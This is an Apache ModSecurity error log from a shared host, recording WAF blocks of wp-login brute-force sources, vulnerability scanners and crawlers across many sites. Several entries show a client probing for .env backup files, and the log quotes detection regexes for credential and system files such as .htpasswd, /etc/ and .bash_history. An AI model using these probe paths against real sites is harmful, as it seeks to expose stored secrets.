[Tue May 26 19:35:09.057229 2026] [security2:error] [pid 58470:tid 58618] [client 208.84.100.238:6586] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "webmail.onesoft.in"] [uri "/___proxy_subdomain_webmail/.env.copy"] [unique_id "ahWolbnjVHRH3AGGvmYYKQAAABI"]
[Tue May 26 19:35:09.057441 2026] [security2:error] [pid 58470:tid 58621] [client 208.84.100.238:6530] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "webmail.onesoft.in"] [uri "/___proxy_subdomain_webmail/.env.old"] [unique_id "ahWolbnjVHRH3AGGvmYYLAAAABU"]
[Tue May 26 19:35:09.058145 2026] [security2:error] [pid 58470:tid 58673] [client 208.84.100.238:6538] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "webmail.onesoft.in"] [uri "/___proxy_subdomain_webmail/.env.backup"] [unique_id "ahWolbnjVHRH3AGGvmYYKwAAAEk"]
[Tue May 26 19:35:09.058209 2026] [security2:error] [pid 58470:tid 58693] [client 208.84.100.238:6562] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "webmail.onesoft.in"] [uri "/___proxy_subdomain_webmail/.env~"] [unique_id "ahWolbnjVHRH3AGGvmYYMQAAAF0"]
[Tue May 26 19:35:09.058227 2026] [security2:error] [pid 58470:tid 58608] [client 208.84.100.238:6684] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "webmail.onesoft.in"] [uri "/___proxy_subdomain_webmail/.env.production.old"] [unique_id "ahWolbnjVHRH3AGGvmYYIQAAAAg"]
[Tue May 26 19:35:09.058542 2026] [security2:error] [pid 58470:tid 58689] [client 208.84.100.238:6616] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "webmail.onesoft.in"] [uri "/___proxy_subdomain_webmail/.env.local.old"] [unique_id "ahWolbnjVHRH3AGGvmYYJQAAAFk"]
[Tue May 26 19:35:09.094153 2026] [security2:error] [pid 58470:tid 58682] [client 208.84.100.238:6396] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "webmail.onesoft.in"] [uri "/___proxy_subdomain_webmail/.env.production~"] [unique_id "ahWolbnjVHRH3AGGvmYYMgAAAFI"]
[Tue May 26 19:35:10.189260 2026] [security2:error] [pid 58470:tid 58655] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWolbnjVHRH3AGGvmYYQgAAADc"]
[Tue May 26 19:35:10.933378 2026] [security2:error] [pid 58470:tid 58585] [remote 35.233.46.64:43695] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 64.46.233.35.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahWolrnjVHRH3AGGvmYYYQAAHnI"], referer: https://canopykaapi.com/wp-login.php
[Tue May 26 19:35:11.117810 2026] [security2:error] [pid 58470:tid 58688] [client 176.65.139.231:35680] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "axum-vermogen.eu"] [uri "/.env"] [unique_id "ahWol7njVHRH3AGGvmYYbQAAAFg"]
[Tue May 26 19:35:12.353052 2026] [security2:error] [pid 58470:tid 58675] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWol7njVHRH3AGGvmYYiAAAAEs"]
[Tue May 26 19:35:13.393924 2026] [security2:error] [pid 58470:tid 58576] [remote 49.12.3.147:52648] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 147.3.12.49.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahWombnjVHRH3AGGvmYYqwAAfmk"]
[Tue May 26 19:35:13.396750 2026] [security2:error] [pid 58470:tid 58643] [client 85.208.96.193:16554] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.anujtradingco.com"] [uri "/features/lightbox-options/"] [unique_id "ahWombnjVHRH3AGGvmYYsgAAACs"]
[Tue May 26 19:35:13.396892 2026] [security2:error] [pid 58470:tid 58643] [client 85.208.96.193:16554] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.anujtradingco.com"] [uri "/features/lightbox-options/"] [unique_id "ahWombnjVHRH3AGGvmYYsgAAACs"]
[Tue May 26 19:35:14.407365 2026] [security2:error] [pid 58470:tid 58672] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWombnjVHRH3AGGvmYYywAAAEg"]
[Tue May 26 19:35:17.308079 2026] [security2:error] [pid 58470:tid 58580] [remote 91.227.122.219:33464] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 219.122.227.91.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWonbnjVHRH3AGGvmYZJAAAK20"]
[Tue May 26 19:35:17.426528 2026] [security2:error] [pid 58470:tid 58521] [remote 121.200.216.55:53008] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 55.216.200.121.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWonbnjVHRH3AGGvmYZKAAAMzI"]
[Tue May 26 19:35:18.804806 2026] [security2:error] [pid 58470:tid 58632] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWonrnjVHRH3AGGvmYZSgAAACA"]
[Tue May 26 19:35:19.464673 2026] [security2:error] [pid 58470:tid 58697] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWon7njVHRH3AGGvmYZYwAAAGE"]
[Tue May 26 19:35:19.779446 2026] [security2:error] [pid 58470:tid 58618] [client 114.119.130.95:56949] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "crusties.agsnails.com"] [uri "/ucxcuo/vehicle-registration-fee-calculator-el-paso-county%2C-colorado"] [unique_id "ahWon7njVHRH3AGGvmYZfAAAABI"], referer: https://crusties.agsnails.com/ucxcuo/vehicle-registration-fee-calculator-el-paso-county%2C-colorado
[Tue May 26 19:35:20.706419 2026] [security2:error] [pid 58470:tid 58481] [remote 103.95.119.103:44862] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.119.95.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWooLnjVHRH3AGGvmYZmQAAAQo"]
[Tue May 26 19:35:20.831979 2026] [security2:error] [pid 58470:tid 58605] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWooLnjVHRH3AGGvmYZlgAAAAU"]
[Tue May 26 19:35:21.504595 2026] [security2:error] [pid 58470:tid 58477] [remote 211.23.68.235:44301] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.68.23.211.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWoobnjVHRH3AGGvmYZuQAAEwY"]
[Tue May 26 19:35:22.912181 2026] [security2:error] [pid 58470:tid 58600] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWoornjVHRH3AGGvmYZ2QAAAAA"]
[Tue May 26 19:35:25.116391 2026] [security2:error] [pid 58470:tid 58710] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWopLnjVHRH3AGGvmYaDgAAAG4"]
[Tue May 26 19:35:25.499815 2026] [security2:error] [pid 58470:tid 58504] [remote 103.95.119.103:44862] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.119.95.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWopbnjVHRH3AGGvmYaMAAAYSE"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:35:27.292225 2026] [security2:error] [pid 58470:tid 58707] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWoprnjVHRH3AGGvmYaUQAAAGs"]
[Tue May 26 19:35:27.381661 2026] [security2:error] [pid 58470:tid 58698] [client 190.60.41.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWoprnjVHRH3AGGvmYaVAAAAGI"]
[Tue May 26 19:35:29.062425 2026] [security2:error] [pid 58470:tid 58631] [client 185.198.240.88:59779] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "jhonweb.com"] [uri "/wp-includes/css/buttons.css"] [unique_id "ahWoqbnjVHRH3AGGvmYajgAAAB8"]
[Tue May 26 19:35:29.399024 2026] [security2:error] [pid 58470:tid 58681] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWoqLnjVHRH3AGGvmYajQAAAFE"]
[Tue May 26 19:35:31.563749 2026] [security2:error] [pid 58470:tid 58624] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWoq7njVHRH3AGGvmYayAAAABg"]
[Tue May 26 19:35:32.913940 2026] [fcgid:warn] [pid 58470:tid 58656] (70014)End of file found: [client 66.132.172.102:16410] mod_fcgid: can't get data from http client
[Tue May 26 19:35:33.873399 2026] [security2:error] [pid 58470:tid 58631] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWorbnjVHRH3AGGvmYbBwAAAB8"]
[Tue May 26 19:35:35.538409 2026] [security2:error] [pid 58470:tid 58525] [remote 5.42.158.148:43958] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 148.158.42.5.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWor7njVHRH3AGGvmYbPQAAWDY"]
[Tue May 26 19:35:36.346184 2026] [security2:error] [pid 58470:tid 58673] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWor7njVHRH3AGGvmYbTwAAAEk"]
[Tue May 26 19:35:38.134485 2026] [security2:error] [pid 58470:tid 58654] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWosbnjVHRH3AGGvmYbigAAADY"]
[Tue May 26 19:35:39.397088 2026] [security2:error] [pid 58470:tid 58610] [client 77.68.9.24:49471] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 24.9.68.77.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "moes-art.com"] [uri "/images/images/cache.php"] [unique_id "ahWos7njVHRH3AGGvmYbswAAAAo"], referer: www.google.com
[Tue May 26 19:35:40.056744 2026] [security2:error] [pid 58470:tid 58683] [client 66.249.64.170:55163] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "doyecpa.com"] [uri "/index.php"] [unique_id "ahWosrnjVHRH3AGGvmYbpgAAAFM"], referer: http://doyecpa.com/prizes/121100662
[Tue May 26 19:35:40.316451 2026] [security2:error] [pid 58470:tid 58727] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWos7njVHRH3AGGvmYbxwAAAH8"]
[Tue May 26 19:35:41.616764 2026] [security2:error] [pid 58470:tid 58556] [remote 74.7.241.58:59284] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahWotbnjVHRH3AGGvmYcAAAAKFU"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/public_html/jkjuice.com/wp-includes
[Tue May 26 19:35:42.007870 2026] [security2:error] [pid 58470:tid 58649] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWotbnjVHRH3AGGvmYb_wAAADE"]
[Tue May 26 19:35:42.534804 2026] [security2:error] [pid 58470:tid 58652] [client 77.68.9.24:60735] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 24.9.68.77.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "moes-art.com"] [uri "/images/images/cache.php"] [unique_id "ahWotrnjVHRH3AGGvmYcJQAAADQ"], referer: www.google.com
[Tue May 26 19:35:42.987984 2026] [security2:error] [pid 58470:tid 58596] [remote 167.172.25.98:40692] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 98.25.172.167.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/wp-login.php"] [unique_id "ahWotrnjVHRH3AGGvmYcMAAAeX0"]
[Tue May 26 19:35:45.081788 2026] [security2:error] [pid 58470:tid 58699] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWouLnjVHRH3AGGvmYcbAAAAGM"]
[Tue May 26 19:35:46.839761 2026] [security2:error] [pid 58470:tid 58638] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWournjVHRH3AGGvmYcpQAAACY"]
[Tue May 26 19:35:48.308717 2026] [security2:error] [pid 58470:tid 58633] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWou7njVHRH3AGGvmYc0AAAACE"]
[Tue May 26 19:35:49.227207 2026] [security2:error] [pid 58470:tid 58623] [client 18.97.9.99:49767] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moneyapp.com.co"] [uri "/index.php"] [unique_id "ahWovLnjVHRH3AGGvmYc6gAAABc"]
[Tue May 26 19:35:51.033375 2026] [security2:error] [pid 58470:tid 58628] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWovrnjVHRH3AGGvmYdKAAAABw"]
[Tue May 26 19:35:52.332832 2026] [security2:error] [pid 58470:tid 58627] [client 84.131.189.144:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWov7njVHRH3AGGvmYdSAAAABs"]
[Tue May 26 19:35:53.249421 2026] [security2:error] [pid 58470:tid 58634] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWowLnjVHRH3AGGvmYdaAAAACI"]
[Tue May 26 19:35:53.421973 2026] [security2:error] [pid 58470:tid 58624] [client 85.208.96.210:26766] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/"] [unique_id "ahWowbnjVHRH3AGGvmYdegAAABg"]
[Tue May 26 19:35:53.422105 2026] [security2:error] [pid 58470:tid 58624] [client 85.208.96.210:26766] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/list/"] [unique_id "ahWowbnjVHRH3AGGvmYdegAAABg"]
[Tue May 26 19:35:54.718600 2026] [security2:error] [pid 58470:tid 58704] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWowrnjVHRH3AGGvmYdpQAAAGg"]
[Tue May 26 19:35:57.273170 2026] [security2:error] [pid 58470:tid 58646] [client 212.115.49.194:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWoxbnjVHRH3AGGvmYeJQAAAC4"], referer: https://www.anujtradingco.com/
[Tue May 26 19:35:57.496976 2026] [security2:error] [pid 58470:tid 58505] [remote 178.104.164.71:33390] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 71.164.104.178.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWoxbnjVHRH3AGGvmYeJwAACiI"]
[Tue May 26 19:35:57.903715 2026] [security2:error] [pid 58470:tid 58672] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWoxbnjVHRH3AGGvmYeLQAAAEg"]
[Tue May 26 19:35:59.405950 2026] [security2:error] [pid 58470:tid 58666] [client 74.235.100.195:52968] ModSecurity: Warning. Matched phrase "zgrab" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "302"] [hostname "208.91.198.85"] [uri "/index.cgi"] [unique_id "ahWox7njVHRH3AGGvmYeZAAAAEI"]
[Tue May 26 19:35:59.790517 2026] [security2:error] [pid 58470:tid 58653] [client 212.115.49.194:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWox7njVHRH3AGGvmYecAAAADU"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1216873&moderation-hash=d3cc66ce7d1c68ccb67bb55371b36bc7
[Tue May 26 19:35:59.993937 2026] [security2:error] [pid 58470:tid 58511] [remote 79.143.178.15:42832] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 15.178.143.79.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thedebateafrica.org"] [uri "/wp-login.php"] [unique_id "ahWox7njVHRH3AGGvmYecQAAbig"]
[Tue May 26 19:36:00.619879 2026] [security2:error] [pid 58470:tid 58508] [remote 103.11.102.106:37132] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 106.102.11.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahWoyLnjVHRH3AGGvmYeewAAfyU"]
[Tue May 26 19:36:01.549368 2026] [security2:error] [pid 58470:tid 58641] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWoybnjVHRH3AGGvmYeigAAACk"]
